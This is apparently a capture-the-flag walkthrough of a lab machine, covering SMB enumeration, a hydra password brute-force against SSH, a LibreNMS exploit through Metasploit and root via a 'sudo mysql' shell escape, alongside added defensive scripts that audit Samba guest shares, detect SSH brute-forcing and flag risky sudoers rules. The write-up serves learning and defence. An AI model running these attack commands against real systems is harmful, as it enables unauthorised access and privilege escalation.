Pentest workflow
1. Scanning
- Nmap
2. Enumeration
- Enum4Linux
3. Exploitation
- Smbclient
- Hydra
- Msfconsole
4. Privilege escalation
- Exploiting sudo rights
Detailed notes
Scanning:
Nmap scan

The scan shows port 80 open and an SMB service running; try the web service first.

Tried further directory brute-forcing on the web service, but nothing was found.
Next, run an SMB scan with enum4linux, which reveals a share named anonymous.

Connect with smbclient
smbclient -L 192.168.1.102
smbclient //192.168.1.102/anonymous
ls
cd backups
get log.txt


The public share contains a backups folder; inside it is log.txt, which we retrieve to the local machine.
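The anonymous share is the foothold here, so the defender-side check is an audit of the Samba configuration for shares that accept unauthenticated sessions. The following Python script is an added example, not code from the original write-up; it assumes a standard smb.conf layout, and the configuration text embedded in it is constructed to mirror the anonymous share found above.

```python
"""Audit a Samba smb.conf for shares that are reachable without credentials.

Added example, not part of the original write-up. It assumes a standard
smb.conf layout; the configuration text below is constructed to mirror
the 'anonymous' share found during enumeration.
"""
import configparser

# Constructed sample: one guest-readable share and one restricted share.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server role = standalone server
   map to guest = Bad User

[anonymous]
   path = /srv/samba/anonymous
   browseable = yes
   read only = yes
   guest ok = yes

[private]
   path = /srv/samba/private
   valid users = aeolus
   guest ok = no
"""

TRUTHY = {"yes", "true", "1"}
# Built-in sections that are not ordinary file shares.
SKIP_SECTIONS = {"global", "printers", "print$", "homes"}


def parse_smb_conf(text):
    """Return {section: {option: value}} with option names lower-cased.

    Leading indentation is stripped first so configparser does not treat
    indented option lines as continuations of the previous value.
    """
    flat = "\n".join(line.strip() for line in text.splitlines())
    parser = configparser.ConfigParser(
        interpolation=None, strict=False, inline_comment_prefixes=(";", "#")
    )
    parser.optionxform = str.lower
    parser.read_string(flat)
    return {name: dict(parser.items(name)) for name in parser.sections()}


def is_true(value):
    return value.strip().lower() in TRUTHY


def find_guest_shares(conf):
    """Return the names of shares that allow access without a valid login.

    'guest ok' (alias 'public') or 'guest only' on a share means an
    anonymous session can connect to it, which is exactly what
    smbclient //host/anonymous relied on above.
    """
    guest_shares = []
    for name, opts in conf.items():
        if name in SKIP_SECTIONS:
            continue
        guest_ok = is_true(opts.get("guest ok", opts.get("public", "no")))
        guest_only = is_true(opts.get("guest only", "no"))
        if guest_ok or guest_only:
            guest_shares.append(name)
    return guest_shares


def guest_mapping(conf):
    """Return the global 'map to guest' setting (Samba's default is 'Never').

    'Bad User' or 'Bad Password' turns failed logins into guest sessions,
    which widens the reach of any guest-accessible share.
    """
    return conf.get("global", {}).get("map to guest", "Never").strip()


if __name__ == "__main__":
    conf = parse_smb_conf(SAMPLE_SMB_CONF)
    print("map to guest:", guest_mapping(conf))
    for share in find_guest_shares(conf):
        print(f"share [{share}] is reachable without credentials; "
              f"set 'guest ok = no' and restrict it with 'valid users'")
```

To audit a real host, replace the constructed text with `open("/etc/samba/smb.conf").read()`; any share the script lists should either lose `guest ok = yes` or be limited with `valid users`, and `map to guest` should go back to `Never` unless a guest share is deliberately intended.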

It reveals a username, aeolus; prepare to brute-force its password.
Exploitation:
Try passwords with hydra
hydra -l aeolus -P /usr/share/wordlists/rockyou.txt 192.168.1.102 ssh
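A wordlist attack like the one above leaves a very characteristic trail in sshd's log: a burst of "Failed password" lines from one source, then an "Accepted password" from the same source. The script below is an added example, not part of the original write-up; it assumes the classic syslog format OpenSSH writes to /var/log/auth.log, and the log lines embedded in it are constructed (hostname, PIDs and addresses are made up).

```python
"""Flag SSH password brute-forcing in auth.log and a success that follows it.

Added example, not part of the original write-up. It assumes the classic
syslog line format OpenSSH writes to /var/log/auth.log; the log lines
below are constructed (hostname, PIDs and addresses are made up).
"""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_AUTH_LOG = """\
Mar  3 10:00:01 target sshd[1201]: Failed password for aeolus from 192.168.1.50 port 40001 ssh2
Mar  3 10:00:01 target sshd[1202]: Failed password for aeolus from 192.168.1.50 port 40002 ssh2
Mar  3 10:00:02 target sshd[1203]: Failed password for invalid user admin from 192.168.1.50 port 40003 ssh2
Mar  3 10:00:02 target sshd[1204]: Failed password for aeolus from 192.168.1.50 port 40004 ssh2
Mar  3 10:00:03 target sshd[1205]: Failed password for aeolus from 192.168.1.50 port 40005 ssh2
Mar  3 10:00:03 target sshd[1206]: Failed password for aeolus from 192.168.1.50 port 40006 ssh2
Mar  3 10:00:04 target sshd[1207]: Accepted password for aeolus from 192.168.1.50 port 40007 ssh2
Mar  3 10:05:00 target sshd[1300]: Failed password for root from 10.0.0.9 port 50000 ssh2
Mar  3 10:30:00 target sshd[1301]: Failed password for root from 10.0.0.9 port 50001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_line(line, year=2024):
    """Return (timestamp, result, user, ip), or None for lines we do not track.

    syslog timestamps carry no year, so the caller supplies one.
    """
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {ip: {"failures": n, "compromised": [users]}} for noisy sources.

    A source is flagged once it produces `threshold` failures inside a
    sliding window. An accepted login from a flagged source while the
    burst is still inside the window is recorded under "compromised":
    that is the pattern a wordlist run followed by an SSH login leaves.
    """
    recent = defaultdict(deque)  # ip -> timestamps of recent failures
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        window = recent[ip]
        while window and (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if result == "Failed":
            window.append(ts)
            if len(window) >= threshold:
                entry = alerts.setdefault(ip, {"failures": 0, "compromised": []})
                entry["failures"] = max(entry["failures"], len(window))
        elif ip in alerts and len(window) >= threshold:
            if user not in alerts[ip]["compromised"]:
                alerts[ip]["compromised"].append(user)
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()).items():
        print(f"{ip}: {info['failures']} failures in window; "
              f"logins accepted after the burst: {info['compromised'] or 'none'}")
```

The two slow failures from 10.0.0.9 stay below the threshold because they fall outside a single window, while the six rapid failures from 192.168.1.50 trip the alert and the following accepted login is recorded against it. In practice the same rule is what a fail2ban jail encodes, and key-only authentication removes the attack surface entirely.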

With the password obtained, log in using msfconsole.

After logging in to the target, check its network configuration.

Port 8080 is in use; ifconfig on the box shows it is bound only to 127.0.0.1 (reachable locally only), so we change approach and forward it to port 4443 on the attacking machine.

Open the web service from the attacking machine.

It is the LibreNMS management tool; search for exploits against it.

Use the addhost vulnerability, moving to Metasploit for the attack.

Once a bash shell is obtained, move on to privilege escalation.
Privilege escalation:
Check the user's sudo rights: mysql can be run through sudo without a password, so escalate through mysql.
sudo -l
sudo mysql -e '\! /bin/sh'
id
cd /root
cat proof.txt

Then cat proof.txt to complete the attack.
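The root cause of this escalation is a sudoers rule that grants an interactive program with a built-in shell escape, so the fix is on the sudoers side. The script below is an added example, not code from the original write-up; it reads rules in /etc/sudoers syntax, and the excerpt embedded in it is constructed to reproduce the NOPASSWD mysql rule seen above next to two tighter rules.

```python
"""Audit sudoers rules for entries that hand out a root shell indirectly.

Added example, not part of the original write-up. It reads rules in
/etc/sudoers syntax; the excerpt below is constructed to reproduce the
NOPASSWD mysql rule the write-up abuses, next to two tighter rules.
"""
import re
import shlex

SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
aeolus  ALL=(ALL) NOPASSWD: /usr/bin/mysql
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/data/ /mnt/backup/
deploy  ALL=(root) /usr/bin/systemctl restart librenms
"""

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
        "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT"}
# Interactive programs with a built-in way to run a shell (the write-up
# uses mysql's \! escape). Not exhaustive; extend it for your environment.
SHELL_ESCAPE_BINARIES = {"mysql", "vi", "vim", "less", "more", "man"}
SHELLS = {"sh", "bash", "dash", "zsh"}


def parse_sudoers(text):
    """Return a list of {user, runas, nopasswd, command} dicts.

    Aliases, Defaults and includes are skipped; a real audit would expand
    them (or read `sudo -l -U <user>` output instead).
    """
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias",
                                        "Host_Alias", "Runas_Alias", "@include")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for spec in m["cmds"].split(","):
            spec = spec.strip()
            tags = set()
            # Peel leading "TAG:" prefixes such as NOPASSWD: off the command.
            while ":" in spec and spec.split(":", 1)[0].strip().upper() in TAGS:
                tag, spec = spec.split(":", 1)
                tags.add(tag.strip().upper())
                spec = spec.strip()
            rules.append({
                "user": m["user"],
                "runas": (m["runas"] or "root").split(":")[0].strip() or "root",
                "nopasswd": "NOPASSWD" in tags,
                "command": spec,
            })
    return rules


def audit(rules):
    """Return findings for rules that amount to a shell as the run-as user."""
    findings = []
    for r in rules:
        if r["user"] == "root":
            continue  # root already has everything; this rule is conventional
        if r["command"] == "ALL":
            reason = "unrestricted sudo"
        else:
            argv = shlex.split(r["command"])
            name = argv[0].rsplit("/", 1)[-1]
            if name in SHELLS:
                reason = f"runs {name} directly"
            elif name in SHELL_ESCAPE_BINARIES:
                reason = f"{name} can spawn a shell from inside the program"
            else:
                continue
        findings.append({
            "user": r["user"], "command": r["command"], "runas": r["runas"],
            "nopasswd": r["nopasswd"], "reason": reason,
        })
    return findings


if __name__ == "__main__":
    for f in audit(parse_sudoers(SAMPLE_SUDOERS)):
        pw = "without a password" if f["nopasswd"] else "with a password"
        print(f"{f['user']} -> {f['command']} as {f['runas']} {pw}: {f['reason']}")
```

Only the aeolus rule is reported: the rsync and systemctl rules pin the full argument list, which is the shape a sudo grant should take. Where a database user genuinely needs sudo for maintenance, a wrapper script with fixed arguments (and, for editors, the NOEXEC tag) is the usual replacement for granting the interactive client itself.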